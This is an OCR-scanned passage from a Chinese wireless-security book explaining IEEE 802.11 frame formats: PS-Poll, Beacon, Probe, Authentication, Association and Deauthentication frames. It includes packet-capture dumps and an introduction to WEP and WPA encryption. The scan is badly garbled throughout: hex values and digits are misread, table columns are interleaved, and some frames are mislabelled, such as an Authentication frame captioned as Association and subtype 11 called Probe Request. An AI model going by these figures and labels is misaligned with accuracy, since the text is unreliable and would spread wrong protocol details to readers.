控制 权 ， 因 此 会 将 Duration 设 定 为 0。 

如 果 More Fragments 位 为 1， 表 示 还 有 
数据 仍 在 发 送 中 。 此 时 Duration 位 的 用 法 和 
CTS 帧 中 的 Duration 位 相同 。 发 送 ACK 以 及 
短 帧 间隔 所 需要 的 时 间 ， 将 由 最 近 帧 片段 
所 记载 的 Duration 中 减 去 。 如 果 不 是 最 后 
一 个 ACK 帧 ，Duration 的 计算 方式 类 似 CTS 
Duration 的 计算 方式 。 事 实 上 ,IEEE 802.11 
协议 中 将 ACK 帧 中 的 Duration 设 定 称 为 虚拟 
CTS。 

(3) Address 1 位 : Receiver Address( 接 
收 端 地 址 ) 。 

接收 端 地 址 是 由 所 要 应 答 的 发 送 端 由 
复制 而 来 。 技 术 上 而 言 ， 它 是 由 所 要 应 答 
帧 的 Address 2 位 复制 而 来 。 应 答 主要 是 针 
对 数据 帧 、 管 理 帧 以 及 PS-Poll 帧 。 

下 图 为 使 用 抓 包 软件 抓 取 的 实际 CTS 数 


6.2.4 PS-Poll (省 电 模式 一 轮 询 ) 


当 一 部 移动 工作 站 从 省 电 模 式 中 苏 
醒 ， 便 会 发 送 一 个 PS-Poll 帧 给 接 入 点 ， 
以 取得 任何 暂 存 帧 。 下 图 为 PS-Poll 帧 的 
格式 。 


-= a 
| : 


Type | sub Type el © 
Protocol | YPe “oo | oolelelelole 


DTDs DS Poner Mnagement 
DFromDs @ More Data 
DMore Fragments © Protected Frame 
Re Border 


PS-Poll 帧 的 MAC 标 头 由 四 个 位 构成 : 
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(1) Frame Control ( 帧 控制 ) 。 帧 的 
subtype 〈 子 类 型 ) 位 被 设 定 为 1010， 代 表 
PS-Poll 帧 。 

(2) AID (连接 识别 码 ) 。PS-Poll 帧 
将 会 以 MAC 标 头 的 第 三 与 第 四 bit 来 代表 
连接 识别 码 (association ID) 。 连 接 识别 码 
是 接 入 点 所 指定 的 一 个 数值 ， 用 以 区 别 各 
个 连接 。 将 此 识别 码 置 入 帧 ， 可 让 接 入 点 
找 出 为 其 〈 移 动工 作 站 ) 所 暂 存 的 帧 。 

连接 识别 码 (AID) 在 PS-Poll 帧 中 ， 
Duration/ID 位 是 连接 识别 码 ， 而 非 虚拟 载 
波 侦 测 功 能 所 使 用 的 数值 。 当 移动 工作 站 
与 接 入 点 连接 时 ， 接 入 点 会 从 1-2007 范围 
内 指派 一 个 值 来 做 为 连接 识别 码 (AID) 。 

(3) Address 1 位 : BSSID。 此 位 包含 
发 送 端 当前 所 在 BSS 网 络 中 的 BSSID， 此 
BSS 建立 自 当前 所 连接 的 AP。 

(4) Address 2 位 。Transmitter Address 

(发 送 端 地 址 ) 。 此 为 PS-Poll 帧 的 发 送 端 
的 MAC 地 址 。 

在 PS-Poll 帧 中 并 未 包含 duration 信 息 ， 
因此 无 法 更 新 NAV。 不 过 ， 所 有 收 到 PS- 
Poll 帧 的 工作 站 ， 都 会 以 短 帧 间隔 加 上 发 
送 ACK 信 号 所 需要 的 时 间 来 更 新 NAV 。 
此 处 的 自动 调整 机 制 ， 使 得 接 入 点 在 发 
送 ACK 信 号 时 ， 会 避免 与 移动 接 入 点 发 生 
碰撞 。 


6.3 ”管理 帧 


在 IEEE 802.11 协 议 中 存在 有 各 式 各 样 
的 管理 帧 ， 目 的 只 是 对 有 线 网 络 提供 简单 
的 服务 。 对 有 线 网 络 而 言 ， 识 别 一 部 工作 
站 非常 简单 ， 因 为 它们 服务 端 与 客户 端 必 
须要 有 物理 连接 。 无 线 网 络 则 必须 建立 一 
些 管 理 机 制 ， 才 能 实现 类 似 的 功能 。 


6.3.1 管理 帧 的 结构 


管理 帧 负责 监督 ， 用 来 增加 或 退出 日 忽 


无 线 网 络 以 及 处 理 接 入 点 之 间 关 联 的 转 
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移 事 宜 。802.11 将 整个 管理 过 程 分 解 为 
三 个 步骤 : 

Estee 国 寻求 连接 的 移动 工作 站 ， 必 须 找 出 可 
供 访问 的 无 线 网 络 。 在 有 线 网 络 中 ， 这 个 
步骤 相当 于 找 出 合适 的 网 络 接口 。 

[step 图 网 络 系统 必须 对 移动 工作 站 进行 身份 
认证 ， 以 此 为 依据 确定 是 否 让 工作 站 与 网 
络 系统 进行 关联 。 在 有 线 网 络 方面 ， 身 份 
认证 是 由 网 络 系统 本 身 提供 。 如 果 必 须 通 
过 网 线 才 能 够 取得 信号 ， 那 么 获取 网 线 的 
过 程 可 以 理解 为 是 一 种 认证 过 程 。 


帧 控制 字段 详细 说 明 见 下 表 。 
表 ，” 帧 控制 字段 详细 说 明 
长 度 
字 段 名 描 述 (位 ) 
Protocol 显示 帧 所 使 用 的 MAC 
(协议 版 本 ) 版 本 
描述 帧 的 类 型 ， 在 管 
Type (类 型 ) 理 帧 中 Type 字段 的 值 | 2 


为 00 


Subtype( 子 类 型 ) 


描述 帧 的 子 类 型 4 


与 From DS 位 一 起 指 


Ep 国 移动 工作 站 必须 与 接 入 点 建立 关联 ， 人 DS 2 
这 样 才能 访问 有 线 网 络 ， 这 相当 于 将 网 线 号 FT 
插 到 有 线 网 络 系统 。 From DS 1 
下 图 为 802.11 管 理 帧 的 基本 结构 。 所 有 
管理 帧 的 MAC 标 头 都 一 样 ， 这 与 的 子 关 ER 
型 无 关 ， 管 理 帧 会 使 用 信息 元 素 〈 带 有 数字 | 
标签 的 数据 区 块 ) 来 与 其 他 系统 交换 数据 。 Retry 是 否 是 重 传 由 1 
es ee 2 5 Power Management | 是否 进入 省 电 模式 | 1 
oo wm | ww | 上 | 和 | op 接 入 点 是 否 有 由 竺 传 | 
© Prame cotol 本 Ce 给 休眠 中 的 工作 站 
Duration rame y 
-ae . 是 否 受 到 链 路 层 的 安 
各 个 字段 详细 说 明 见 下 表 。 Protected Frame 全 协议 的 保护 
表 ”802.11 管 理 帧 各 个 字段 的 说 明 Order 是 否 严格 依次 传送 “| 1 
字段 名 和 | 子 类 型 (Subtype) 与 控制 帧 的 对 应 见 
Frame Control 描述 与 控制 MAC 帧 相关 5 下 表 ， 
〈 帧 控制 ) 信息 表 子 类 型 (Subtype) 与 控制 帧 的 对 应 关系 
Duration 计算 帧 持续 时 间 的 作用 |2 子 类 型 控 制 帧 
Destination Address | MAC 帧 的 目的 地 址 6 0000 Association request〔 连 接 请 求 ) 
Source Address MAC 帧 的 源 地 址 6 0001 Association response〈 连 接 响 应 ) 
用 于 过 滤 收 到 的 MAC 帧 0010 Reassociation request 〈 重 连接 请 求 ) 
BSSID (在 基础 型 网 络 里 为 工 Se s 
Reassoci ( ) 
《基本 服务 集 ID) | 作 站 所 关联 的 接 入 点 的 | ss 
MAC 地 址 ) po Probe request (探测 请 求 ) 探测 请 求 
Sequence Control “| 用 来 重组 帧 片段 以 及 丢 人 
(顺序 控制 ) 弃 重 复 帧 2 0101 Probe response (探测 响应 
Frame Body ef Beacon〈 信 标 ， 被 动 扫描 时 AP 发 出 ， 
( 帧 主体 ) 用 以 传递 上 层 信息 |0~2312 jo00 notify) 最 为 复杂 的 一 个 帧 ， 也 是 需 
要 重点 关注 的 一 个 帧 类 型 
( 帧 校 验 序列 》 | 验证 传 来 的 帧 是 否 有 误 |4 1001 ATIM (通知 传输 指示 消息 ) 
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续 表 
子 类 型 控 制 帧 
1010 | Disassociation (解除 连接 ，notify) 
1011 | Authentication( 身 份 验证 ) 
1100 | Deauthentication (解除 认证 ，notify) 


1101~1111 | Reserved (保留 ， 未 使 用 ) 


6.3.2 ”Beacon ( 信 标 ) 帧 


每 间隔 一 段 时 间 AP 就 会 发 出 一 
Beacon〔 信 标 ) 信号 用 来 宣布 802.11 网 络 的 
存在 。Beacon 帧 中 除 包 含 BSS 参 数 信息 外 ， 
还 包含 接 入 点 缓存 帧 的 信息 ， 因 此 移动 式 
工作 站 要 仔细 聆听 Beacon 信 号 。 

Beacon 帧 长 度 为 16 位 ， 用 来 设 定 Beacon 
信号 之 间 相 隔 多 少时 间 单 位 。 时 间 单 位 通常 
缩写 为 TU， 代 表 1024hs (microsecond) ， 相 
当 于 lms (millisecond) 。Beacon 通 常会 被 
设 定 为 100 个 时 间 单 位 ， 相 当 于 每 100ms， 
也 就 是 0.1s 传 送 一 次 Beacon 信 和 号 。 

下 图 为 Beacon 帧 的 结构 。 


Mac waaer 
6 


Thmestamp 


a 

在 MAC 头 中 的 信息 ， 需 要 关注 以 下 数 
据 信息 。 

(1) Type。 表 示 管 理 帧 ，Beacon 帧 属 
于 管理 帧 ， 所 以 这 里 值 为 0。 

(2) Subtype。 子 类 型 ， 这 里 值 为 十 六 
进 制 的 0x1000， 也 就 是 十 进 制 的 8， 所 以 
确定 为 Beacon 帧 。 

(3) RA、DA。 均 为 广播 地 址 段 。 

(4) TA、SA。 转 发 地 址 、 源 地 址 是 
AP 地 址 。 

(5) BSS ID。 网 络 中 的 标识 。 
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下 图 为 抓 包 软件 抓 取 的 真实 Beacon 巾 ; 


RISE 
Type/Subtype: Beacon frame 《exebaB) 
~ Frame Control Field: 9x8669 


= Type: Management frame (9) 
3966 .... SP 8 


.998 9868 全 96668 = Duration: 9 microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: Tp-LinkT_ed:9 (ec:4b:54:6d:97:a2) 
Source address: Tp-LinkT_9d:97:a2 (6c:4b:54:96d:97: 


US ‘9099 = Fragment number: 
1611 1911 B111 .... = Sequence number: 
~ IEEE 882.11 wireless LAN 
» Fixed parameters (12 bytes) 
» Tagged parameters (226 bytes) 


1. 帧 主体 


管理 帧 十 分 灵活 ， 帧 主体 (frame 
body) 中 的 大 部 分 数据 如 果 使 用 长 度 固定 
的 字段 ， 就 称 为 固定 字段 〈fixed field) ; 
如 果 字 段 长 度 不 确定 ， 就 称 为 信息 元 素 
(information element) 。 所 谓 信息 元 素 ， 
是 指 长 度 不 确定 的 数据 块 〈data block) 。 每 
个 数据 块 均 会 标注 类 型 编号 和 大 小 ， 各 
信息 元 素 的 数据 字段 元 素 都 有 特定 的 解释 
方式 。 

下 图 为 Beacon 帧 主体 数据 及 Capability 


Beacon 帧 主体 数据 及 Capability Info 字 
段 的 主要 信息 介绍 如 下 : 

(1) Timestamp《〈 时 戳 ) 。 可 用 来 同步 
BSS 中 的 工作 站 ，BSS 的 主 计时 器 会 定期 
发 送 当前 已 使 用 的 微 秒 数 。 当 计数 器 到 达 


最 大 值 时 ， 便 会 从 头 开始 计数 。( 对 一 
个 长 度 64bit、 可 计数 超过 580000 年 的 


计数 器 而 言 ， 很 难 会 遇 到 有 从 头 开 始 计数 
的 一 天 ) 
(2) Intrval。 定 时 发 送 位 ， 该 位 数据 表 
明 Beacon 帧 间隔 多 长 时 间 进 行 重新 广播 。 
(3) Capability Info〈 性 能 信息 ) 字段 。 


95 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


传送 Beacon 信号 的 时 候 ， 它 被 用 来 告知 网 
络 具备 何 种 性 能 ， 此 字段 应 用 于 Beacon 帧 、 
Probe Response 帧 、Probe Request 帧 。 

2. Beacon 帧 标记 参数 

下 图 为 Beacon 帧 标记 参数 。 


Tag; Vendor 5pecifici Ralink Technology, Corp. 


主要 参数 介绍 如 下 : 

(1)SSID 信 息 。 包 括 SSID 的 网 络 标识 、 
SSID 的 长 度 等 ， 如 果 设 置 隐藏 AP 抓 到 的 
数据 帧 中 SSID 为 空 ， 但 是 长 度 有 数据 ， 通 
过 这 点 可 以 判断 是 否 有 隐藏 AP。SSID 信 
息 如 下 图 所 示 。 


= Tag: SSID parameter set: TP-LINK_97A2 
Tag Number: SSID parameter set (6) 
Tag length: 12 
SSID: TP-LINK_97A2 


(2) Supported Rates 字段 。AP 所 支持 的 
工作 速率 ， 如 下 图 所 示 ， 通 过 这 个 速率 也 
可 以 大 概 判 断 AP 是 支持 哪 种 IEEE 802.11 
协议 。 

Tag; Supported Rates 1(B), 2(B), 5.5(B), 11(8), 9, 18, 36, 54, [Mbit/sec] 
Tag length: 8 
人 《二 

2(B) (9x84) 
5.5(B) (ex8b) 
11(B) (9x96) 


9 《ex12) 
18 (Ox24) 


Supported Rates: 
Supported Rates: 
Supported Rates: 
Supported Rates; 
Supported Rates: 
Supported Rates; 
Supported Rates: 


(3) DS Parameter Set 字 段 。AP 工 作 
信道 ， 如 下 图 所 示 。 描 述 了 当前 工作 的 信 
道 ， 实 际 上 这 个 字段 在 Radiotap 中 有 。 
Radiotap 是 网 卡 在 接收 信号 时 ， 去 除 PLCP 
header 部 分 后 ， 在 本 地 增加 的 头 部 ， 其 中 就 
有 功率 、 信 道 这 样 的 物理 层 信息 。 

下 


Tag length: 1 
Current Channel: 1 


AP 中 支持 的 扩展 速率 ， 如 右上 图 
所 示 。 


36 (0x48) 
54 (ox6c) 
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~ Tag: Extended Supported Rates 6, 12, 24, 48, [Mbit/sec. 
Tag Number: Extended Supported Rates (59) 
Tag length: 4 
Extended Supported Rates: 
Extended Supported Rates: 
Extended Supported Rates: 
Extended Supported Rates: 


(4) country 字段 。 表 面 上 这 个 字段 用 
处 不 大 ， 仅 仅 表明 了 国家 代号 。 实 际 上 这 
个 字段 是 用 来 控制 信号 发 送 功率 的 。 由 于 
每 一 个 国家 都 有 相应 的 法 律 管理 RF 发 射 
功率 ， 不 能 够 违法 。 在 beacon 中 ， 即 通过 
country 字段 来 限制 所 有 节点 的 发 射 功率 。 
同样 的 ， 也 有 限定 能 够 使 用 的 信道 范围 ， 
如 下 图 所 示 。 


6 (exec) 
12 (ex18) 
24 (ex30) 
48 (gx69) 


amy (0x20) 
nto: FArst Channsl mber: 1, Nonber of channele: 13, Waxinn Tranenit pouer Level: 20 dpn 


(5) TIM 标记 。 这 里 主要 就 是 与 DTIM 
有 关 ， 有 关 Beacon 周期 设置 与 节能 有 关 的 
部 分 ， 都 与 该 字段 有 关 ， 如 下 图 所 示 。 


* Tag: Traffic Indication Map (TIM): DTIM © of © bitmap 
Tag Number: Traffic Indication Map (TIM) (5) 
Tag length: 4 
DTIM count: 9 
DTIM period: 1 
~ Bitmap control: 9x99 
ee 9 = Multicast: False 
6969 699. = Bitmap Offset: 9x69 
Partial Virtual Bitmap: 98 
Association ID: Ox93 


(6) Vendor Specific。 使 用 WPA 进行 数 
据 加 密 ， 不 是 每 个 设备 都 会 选取 该 字段 ， 
如 下 图 所 示 。 


Tag: Vendor Specificy Microsoft Corp.: WPA Information Elenent 
Tag Munber: Vendor Specific (221) 
Tag length: 22 
OUI: 60:50:f2 (Microsoft Corp.) 
Vendor Specific OUI Type: 1 
Type: WPA Information Elenent (exel) 
WPA Version: 1 
~ Multicast Cipher Suite: 96;58:f2 (Microsoft Corp,) AES (CCN) 
Nulticast Cipher Suite OUI; 09:56:f2 (Microsoft Corp.) 
Nulticast Cipher Suite type: AES (CCM) (4) 
Unicast Cipher Suite Count: 1 
~ Unicast Cipher Suite List 08:58:f2 (Microsoft Corp.) AES (CCN) 
， Unicast Cipher Suite: 60:50:f2 (Microsoft Corp,) AES (CCH) 
Auth Key Managenent (AKN) Suite Count: 1 
~ Auth Key Managenent (AKN) List 99:56:f2 (Microsoft Corp,) PSK 
~ Auth Key Managenent (AXN) Suite: 98:5e:f2 (Microsoft Corp.) PSK 
Auth Key Management (AKM) OUT: 96:56:f2 (Microsoft Corp-) 
Auth Key Management (AKM) type: PSK (2) 


(7) ERP information 部 分 。ERP 全 称 
是 Extended Rate PHY， 就 是 802.11g 对 应 
的 模式 。 在 这 里 主要 是 为 了 兼容 模式 所 存 
在 ， 主 要 关注 其 中 的 Non ERP Present 位 ， 
通过 该 位 ， 可 以 同步 全 网 开启 对 802.11b 的 
兼容 ， 否 则 就 关闭 兼容 。 由 于 是 beacon 进 
行 同步 的 ， 所 以 一 旦 开启 ， 全 网 所 有 的 STA 
都 是 工作 在 兼容 模式 下 ， 如 下 图 所 示 。 
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~ Tag: ERP Information 

Tag Number: ERP Information (42) 

Tag length: 1 

~ ERP Information: 9x94 

Non ERP Present: Not set 
Use Protection: Not set 
Barker Preamble Mode: Set 
Reserved: 9x99 


9666 0... 


6.3.3 ”Probe Request (探测 请 求 ) 帧 


Probe Request (探测 请 求 ) 帧 ， 
一 般 用 于 STA 探 测 网 络 中 的 AP 时 来 使 用 ， 
有 两 种 形式 ， 第 1 种 形式 为 探测 网 络 中 所 有 
AP， 第 2 种 形式 为 探测 之 前 连接 过 的 AP。 
当 AP 接 收 到 ProbeRequest 请 求 后 并 且 STA 之 
前 连接 过 该 AP， 此 时 AP 会 回应 一 个 Probe 
Response《〈 回 应 探测 响应 ) 帧 。 

Probe Request 帧 的 MAC 头 信息 ， 如 
下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 
帧 ，Subtype 位 为 4， 表 明子 类 型 为 Probe 
Request 帧 。 


FIEEE 602.11 Probe Request, Flags 
Type/Subtype: Probe Request (9x9964) 
~ Frame Control Field: gx4999 
= Version: 9 
= Type: Management frame (9) 
= Subtype: 4 
,Flags: 6x69 
.999 0000 09900 9999 = Duration: 9 microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff: ff) 


Destination address: Broadcast (ff ff:ff) 
Transmitter address: Google_eg:c2: eg:c2:23) 
Source address: Google_eg:c2:23 (da: c2:23) 


BSS Id: Broadcast (ff:ff:ff:ff:ff:f 
， 66699 = Fragment numbt 


6116 1611 1619 ,.,， = Sequence number: 1722 


当 SSID 长 度 为 0 时 ，Probe 不 包含 具体 
的 SSID 信 息 ， 如 果 某 个 AP 隐藏 了 SSID， 就 
不 回应 这 种 Probe Request， 如 下 图 所 示 。 


~ IEEE 892.11 wireless LAN 

~ Tagged parameters (65 bytes) 

~ Tag: SSID parameter set: Wildcard SSID 

Tag Number: SSID parameter set (9) 

Tag length: 9 

SSID: 
Tag: Supported Rates 1，2，5.5，11，[Mbit/sec] 
Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
Tag: DS Parameter set: Current Channel: 1 
Tag: HT Capabilities (892.11n D1.19) 
Tag: Vendor Specific: Microsoft Corp.: 
Tag: Extended Capabilities (5 octets) 


当 SSID 长 度 大 于 0 时 ， 此 SSID 即 为 要 扫 
描 SSID， 如 果 SSID 隐 藏 ， 当 收 到 这 种 Probe 
Request 包 ， 必 须 回应 Probe Response 帧 ， 
Probe Response 包 含 了 很 多 SSID 的 信息 ; 这 
种 类 型 的 包 对 于 连接 隐藏 SSID 是 必要 的 ， 
如 下 图 所 示 。 


Unknown 8 


~ IEEE 892.11 wireless LAN 

~ Tagged parameters (68 bytes) 

~ Tag: SSID parameter set: wan 

Tag Number: SSID parameter set (9) 

Tag length: 3 

SsID: wan 
Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
Tag: DS Parameter set: Current Channel: 1 
Tag: HT Capabilities (892.11n D1.19) 
Tag: Vendor Specific: Microsoft Corp.: 
Tag: Extended Capabilities (5 octets) 


Unknown 8 


6.3.4 Probe Response (回应 探测 
响应 ) 帧 


Probe Response 帧 的 MAC 头 信息 ， 如 : 


下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 
帧 ，Subtype 位 为 5， 表 明子 类 型 为 Probe Re- 
shone 


= Versio! 
= Type: Nanagenent frane (9) 
= Subtype: 5 


61 1111 = Duration: 223 microseconds 
Receiver address: Guangdon 6f:e7:df Ga: 29: 5a:6f:e7: of) 

Destination address: Guangdon_6f:e7:df (3 df 
Transmitter address: HuaweiTe_7d:37:95 (e4 
Source address: HuaweiTe_7d:37:95 (e4 
©_7d:37:95 (e4:68:a3:7 
9989 = Fragment number: 
。= Sequence number: 


下 图 ys Response 帧 数据 部 分 
信息 。 


EEE 1 wireless LN 


‘ = SSS-oFDW: Wot Allowed 
D Delayed Bloch Ack Not Teplenented 
= Immedlate alock Ack: NOC Lapleaenced 


S58), 08), 0, 9, 42, 18, tott/ace] 


Cede’ Ch, Enviromaane wy 
Link haroin: 2 


Tag: Extended Supparted Aates 24, 36, ag, 4, [Moit/sec] 
» Ta0; Vendor Specific: Nicrosoft Corp' ; w/wE; Paraneter Elenent 
Teg: Vendor Specific: Atheros Comeunications, Ine.: Advanced Capabllity 


其 中 ，Beacon Iterval 字 段 给 出 了 Beacon 
帧 发 送 间隔 ，ESS 字 段 表明 该 数据 由 AP 端 
发 送 ， 其 中 Tagged 标 记 中 还 会 给 出 SSID 以 
及 传输 速率 ，AP 是 根据 SSID 以 及 传输 速率 
判断 此 STA 是 否 连 接 过 ， 如 果 这 两 个 字段 
相同 ， 即 使 STA 与 AP 之 前 并 没有 建立 过 连 
接 ，AP 也 会 回应 Probe Response 帧 数据 。 


6.3.5 ”Association (身份 认证 ) 帧 
Association (身份 认证 ) 帧 的 MAC 头 着 


oy 
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信息 ， 如 下 图 所 示 ， 其 中 Type 位 为 0， 表 明 
是 管理 帧 ，Subtype 位 为 11， 表 明子 类 型 为 
Probe Request 帧 四 


IEEE 802.,11 Authentication, Flags: 
Type/Subtype: Authentication (9xoeeb) 
~ Frame Control Field: 9xbeee 
. 99 = Version: © 
= Type: Management frame (9) 
Subtype: 11 


.6999 0999 1101 1111 = Duration: 223 microseconds 
Receiver address: Guangdon_6f:e7:df (38:29: 
Destination address: Guangdon_6f:e7:df (38: 
Transmitter address: HuaweiTe_7d:37:92 (e4 
Source address: HuaweiTe_7d:37:92 (e4:58:a3:7d:37 
BSS Id: HuaweiTe_7d:37:92 (e4:68:a3:7d:37:92) 
二 09009 = Fragment number: 9 

9661 0900 0060 .... = Sequence number: 256 


下 图 为 Association 帧 数据 部 分 。 


~ IEEE 802.11 wireless LAN 
~ Fixed parameters (6 bytes) 
Authentication Algorithm: Open System (6) 
Authentication SEQ: 9x9962 
Status code: Successful (9x9996) 


主要 参数 介绍 如 下 : 

(1) Authentication Algorithm。 身份 认 
证 类 型 ， 取 值 为 0 代表 开发 系统 身份 认证 
无 须 密码 ， 取 值 为 1 代表 为 共享 密 钥 身份 
认证 。 

(2) Authentication SEQ。 身份 认证 帧 
序列 号 ， 由 于 身份 认证 会 有 多 个 帧 交换 ， 
所 以 SEQ 是 每 次 身份 验证 的 中 的 一 个 序列 
号 ， 取 值 为 1 ~ 65535 这 个 范围 。 

(3) Status Code。 认 证 是 否 成 功 。 

(4) Challenge text。 该 字段 只 有 使 用 共 
享 密 钥 才 会 出 现 ， 用 于 存放 密 钥 。 


昌 6.3.6 ”Association Request 与 
Association Response 


当 移 动工 作 站 试图 关联 接 入 点 时 ， 接 
入 点 会 回复 一 个 Association Response (关联 
响应 ) 或 Reassociation Response (重新 关联 
响应 ) 帧 ， 两 者 之 间 的 差别 在 于 Frame Con- 
trol 位 所 记载 的 subtype 位 。 所 有 位 均 是 必须 


Type/Subtype: Association Request (exe688) 


Version: 9 
+. = Type: Management frame (9) 
.. = Subtype: © 


.968 6991 9611 1910 = Duratid 
Receiver address: 62:1f:3f 
Destination address: 62:1f 
Transmitter address: Guang: 
Source address: Guangdon 1: 
BSS Id: 62:1f:8f:7f:5e:4d (62:1f:8f: 
6969 = Fragment number: © 

6611 1011 9616 .... = Sequence number: 946 


下 图 为 Association Request 帧 数据 
部 分 。 


314 microseconds 


FTEEE BOI wireless AN 
Flxeg paraserers (4 byresl 
-capabilitiss Inforaatioy，eysdod 


SS status; Transnitter beongs to a B55 
participation capabilities: No point coordinator at AP (Be8)| 


ee] 


,54, [Mbit/sec] 


» Tag: Yendor Specific; Mcrosoft Corp.: WA/WME: Information Element 


下 图 为 Association Response (关联 响 
应 ) 帧 MAC 信 息 。 


Type/Subtype: Association Response (9x9991) 


66 = Version: 9 
= Type: Management frame (9) 
.. = Subtype: 1 


.688 6000 9111 1111 = Durati 
Receiver address: 90:be:6c:1: 
Destination address 
Transmitter address: Huawe: 
Source address: HuaweiTe_7d: 


127 microseconds 
355 :13: 


9961 0668 9991 .... 


= Sequence number: 257 


下 图 为 Association gesponse 术 疾 
部 分 。 


capabilities: Transnitter is an Ap 
TBSS status: Tranemitter belongs to a 8SS 

rp parTic1pation capanilities: No ponf coordinator At Al (bx 
Priveey: AP/STA cannot support NEP 

Short Prearble: Allowed 

PBCC: Not Allowed 


mt ate Rlock acts Nat Tupi emented 
sts code: Successful (@r0008) 
39 e000 8669 1968 = Association TD: ex 
~ Tagge paranerers (2 byres) 
Tag: Sopported natas 1(5), 2(8), 5.5(8), 6, 9, 14(8), 13, 48, [mbit/see] 
» Ta0; Extended Supported RAtes 24, 36, 49, 54, [Mbit/Sec] 
» Tag: Yendor Specific Microsoft Corp.: wh/WHE: Paraneter Elegent 


的 。 在 应 答 的 过 程 中 ， 接 入 点 会 指定 一 个 
Association ID (关联 识别 码 ) ， 至 于 指定 
的 方式 则 因 实 际 操作 而 不 同 。 

下 图 为 Association Request (关联 请 
求 ) 帧 的 MAC 信 息 。 
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其 中 Status code 字 段 表 明 是 否 关 联 成 
功 ，Association ID 字段 是 关联 成 功 后 AP 给 
客户 端的 一 个 ID， 用 于 标记 在 AP 关联 列表 
中 ， 也 用 于 客户 端 唤醒 时 使 用 。 


6.3.7 Disassociation 与 Deauthentication 


Disassociation 〈 取 消 关 联 ) 帧 用 来 取 
消 一 段 关 联 关 系 ， 而 Deauthentication ( 解 
除 认 证 ) 帧 则 用 来 解除 一 段 认 证 关系 。 两 
者 均 包 含 一 个 固定 位 Reason Code (原因 代 
码 ) ， 当 然 Frame Control 位 彼此 不 同 ， 因 为 
不 同类 型 的 管理 帧 拥有 不 同 的 子 类 型 。 
| 图 为 Disassociation 巾 数据 信息 言 息 。 


Type/Subtype; Disassociate (0x900a) 


00.. = Type: Managenent frane (8) 
3616 Subtype: 1 


‘00 G00 B111 1111 = Duration: 127 nicroseconds 
iver nddress: Vivoob} 94:02:00 (19::81:84:02:3) 


D009 = Fragment nunber: © 
= Sequence number: 258 


because sending STA 1s leaving (or has left) BSS (9x9908) 


下 图 为 Deauthentication 帧 信息 。 


+ 因 
698 6969 G111 1 
Receiver address 
Destination address: Xiaomi 
Transnitter address: Huawei 
Source address: HuaweiTe gc:1 
BSS 1d;: HuaweiTe_ 8c:19:a5 (b4: 
.0600 = Fragment number 
9961 6666 1616 = Sequence number: 266 
~ IEEE 882.11 wireless LAN 
~ Fixed parameters (2 bytes) 
Reason code， Previous authentication no longer valid (bx9992) 


其 中 Reason code 字 段 表明 取消 关联 或 
者 解除 认证 的 方式 ， 见 下 表 。 
表 取消 关联 或 者 解除 认证 的 方式 


Reason 
Description Meaning0 
Code 四 由 
0 No Reason Code Normal operation 
Client associated but 
1 Unspecified Reason s 
no longer authorized 
Previous 
0 Client associated but 
2 Authentication no 
not authorized 
longer valid 
Deauthenticated 
Deauthentication because sending STA 
leaving is leaving IBSS or 
ESS 
训 Disassociation Due | Client session 
to Inactivity timeout exceeded 
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Description Meaning0 
AP is busy and 
Disassociation AP unable to handle 
Busy currently associated 
clients 
Class2 Frame from a ee . 
Non-Authenticated Ee 
> 1t Was 
Station 
Authenticated 
Client attempted to 
Class3 Frame from 
transfer data before 
Non-Associated ; 
Station pi 
Associated 
Disassociation STA | STA is leaving or has 
has Left left BSS 
STA Request STA(re) association 
Association is not authenticated 
Without with 
Authentication Responding station 
Missing Reason Client momentarily 
Code in an unknown state 


6.4 ”无 线 通 信 加 密 原理 


在 了 解 了 无 线 通信 的 数据 帧 结构 后 ， 
下 面 介 绍 无 线 通信 的 加 密 原 理 ， 目 前 无 线 
通信 中 的 加 密 方式 有 两 种 ， 分 别 是 WEP 与 
WPA。 其 中 ，WAP 又 分 为 WPA1 与 WPA2 
两 种 。 


6.4.1 WEP 的 加 密 原理 

WEP 通 过 RC4 算 法 进行 加 密 ， 通 过 首 
CRC32 算 法 进行 数据 完整 性 校 验 。RC4 加 密 
解密 的 原理 如 下 。 


加 字 解密 

1011B 1000 8 
xor 0011 3 xor 0011 3 

1000 8 1011 B 
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WEP 整 个 加 密 过 程 可 以 通过 一 张 图 来 
描述 ， 如 下 图 所 示 。 其 中 ，IV (Initializa- 
tion Vector) 为 初始 向 量 ， 由 客户 端 随机 


整个 WEP 加 密 的 过 程 ， 如 果 要 分 步骤 
来 描述 ， 可 以 分 为 以 下 几 个 步骤 : 

[seep 园 由 客户 端 随机 生成 IV， 然 后 与 无 线 密 
码 相 结 合生 成 KSA (初始 向 量 表 ) 。 

[Step 图 原始 发 送 数据 通过 CRC32 生 成 ICV 
(数据 完整 性 校 验 信息 ) 。 

[step 图 原始 数据 与 CV 结合 生成 数据 流 。 
[sep 园 通过 PRGA 算 法 结合 数据 流 长 度 ， 计 
算 生 成 密 钥 流 。 密 钥 流 与 数据 流 是 一 一 对 
[step 图 密 钥 流 与 数据 流 异 或 运算 得 到 加 密 后 
数据 。 

[se 图 发 送 数 据 包头 部 包含 IV 信 息 ， 尾 部 
包含 ICV 信 息 ， 如 果 发 送 数据 超出 数据 包 大 
小 ， 会 对 数据 包 进 行 切 片 处 理 ， 此 时 IV 后 
面 会 跟 上 Key ID，Key ID 用 于 标识 该 数据 包 
是 切片 后 数据 包 的 第 几 个 包 。 


得 6.4.2 ”WPA 的 加 密 原理 


WPA 分 为 WPA1 和 WPA2， 最 早出 现 
WPA1 是 因为 WEP 存 在 严重 漏洞 ， 因 此 
WPA1 的 出 现 是 为 了 解决 当时 WEP 所 存在 的 
缺陷 ， 它 是 在 WEP 的 基础 上 通过 软件 实现 
密码 扩充 。 

WPA1 与 WEP 的 相同 之 处 在 于 它们 都 是 
采用 逐 包 加 密 ，128 位 的 Key 和 48 位 的 初始 
向 量 CIV) ， 同 样 使 用 RC4 流 加 密 技术 ， 
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不 过 ，WPA1 采 用 了 帧 计数 器 ， 可 以 有 效 避 
免 数 据 重 放 攻 击 ， 并 且 采 用 了 TKIP (动态 
